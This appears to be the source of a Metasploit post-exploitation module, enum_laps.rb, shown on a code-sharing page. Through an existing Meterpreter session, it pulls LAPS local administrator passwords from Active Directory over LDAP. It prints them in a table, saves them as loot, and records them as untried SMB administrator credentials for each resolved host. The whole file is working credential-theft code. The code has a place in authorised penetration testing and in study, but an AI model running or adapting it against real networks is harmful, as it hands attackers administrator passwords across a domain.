Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/gather/credentials/enum_laps.rb
Views: 11704
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Auxiliary::Report7include Msf::Post::Windows::LDAP89FIELDS = [10'distinguishedName',11'dNSHostName',12'ms-MCS-AdmPwd',13'ms-MCS-AdmPwdExpirationTime'14].freeze1516def initialize(info = {})17super(18update_info(19info,20'Name' => 'Windows Gather Credentials Local Administrator Password Solution',21'Description' => %q{22This module will recover the LAPS (Local Administrator Password Solution) passwords,23configured in Active Directory, which is usually only accessible by privileged users.24Note that the local administrator account name is not stored in Active Directory,25so it is assumed to be 'Administrator' by default.26},27'License' => MSF_LICENSE,28'Author' => [29'Ben Campbell',30],31'Platform' => [ 'win' ],32'SessionTypes' => [ 'meterpreter' ],33'Compat' => {34'Meterpreter' => {35'Commands' => %w[36stdapi_net_resolve_hosts37]38}39}40)41)4243register_options([44OptString.new('LOCAL_ADMIN_NAME', [true, 'The username to store the password against', 'Administrator']),45OptBool.new('STORE_DB', [true, 'Store file in loot.', false]),46OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]),47OptString.new('FILTER', [true, 'Search filter.', '(&(objectCategory=Computer)(ms-MCS-AdmPwd=*))'])48])4950deregister_options('FIELDS')51end5253def run54search_filter = datastore['FILTER']55max_search = datastore['MAX_SEARCH']5657begin58q = query(search_filter, max_search, FIELDS)59rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e60print_error(e.message)61return62end6364if q.nil? || q[:results].empty?65print_status('No results returned.')66else67print_status('Parsing results...')68results_table = parse_results(q[:results])69print_line results_table.to_s7071if datastore['STORE_LOOT']72stored_path = store_loot('laps.passwords', 'text/plain', session, results_table.to_csv)73print_good("Results saved to: #{stored_path}")74end75end76end7778# Takes the results of LDAP query, parses them into a table79# and records and usernames as {Metasploit::Credential::Core}s in80# the database if datastore option STORE_DB is true.81#82# @param results [Array<Array<Hash>>] The LDAP query results to parse83# @return [Rex::Text::Table] the table containing all the result data84def parse_results(results)85laps_results = []86# Results table holds raw string data87results_table = Rex::Text::Table.new(88'Header' => 'Local Administrator Password Solution (LAPS) Results',89'Indent' => 1,90'SortIndex' => -1,91'Columns' => FIELDS92)9394results.each do |result|95row = []9697result.each do |field|98if field.nil?99row << ''100else101if field[:type] == :number102value = convert_windows_nt_time_format(field[:value])103else104value = field[:value]105end106row << value107end108end109110hostname = result[FIELDS.index('dNSHostName')][:value].downcase111password = result[FIELDS.index('ms-MCS-AdmPwd')][:value]112dn = result[FIELDS.index('distinguishedName')][:value]113expiration = convert_windows_nt_time_format(result[FIELDS.index('ms-MCS-AdmPwdExpirationTime')][:value])114115next if password.to_s.empty?116117results_table << row118laps_results << {119hostname: hostname,120password: password,121dn: dn,122expiration: expiration123}124end125126if datastore['STORE_DB']127print_status('Resolving IP addresses...')128hosts = []129laps_results.each do |h|130hosts << h[:hostname]131end132133resolve_results = client.net.resolve.resolve_hosts(hosts)134135# Match each IP to a host...136resolve_results.each do |r|137l = laps_results.find { |laps| laps[:hostname] == r[:hostname] }138l[:ip] = r[:ip]139end140141laps_results.each do |r|142next if r[:ip].to_s.empty?143next if r[:password].to_s.empty?144145store_creds(datastore['LOCAL_ADMIN_NAME'], r[:password], r[:ip])146end147end148149results_table150end151152def store_creds(username, password, ip)153service_data = {154address: ip,155port: 445,156service_name: 'smb',157protocol: 'tcp',158workspace_id: myworkspace_id159}160161credential_data = {162origin_type: :session,163session_id: session_db_id,164post_reference_name: refname,165username: username,166private_data: password,167private_type: :password168}169170credential_data.merge!(service_data)171172# Create the Metasploit::Credential::Core object173credential_core = create_credential(credential_data)174175# Assemble the options hash for creating the Metasploit::Credential::Login object176login_data = {177core: credential_core,178access_level: 'Administrator',179status: Metasploit::Model::Login::Status::UNTRIED180}181182# Merge in the service data and create our Login183login_data.merge!(service_data)184create_credential_login(login_data)185end186187# https://gist.github.com/nowhereman/189111188def convert_windows_nt_time_format(windows_time)189unix_time = windows_time.to_i / 10000000 - 11644473600190ruby_time = Time.at(unix_time)191ruby_time.strftime('%d/%m/%Y %H:%M:%S GMT %z')192end193end194195196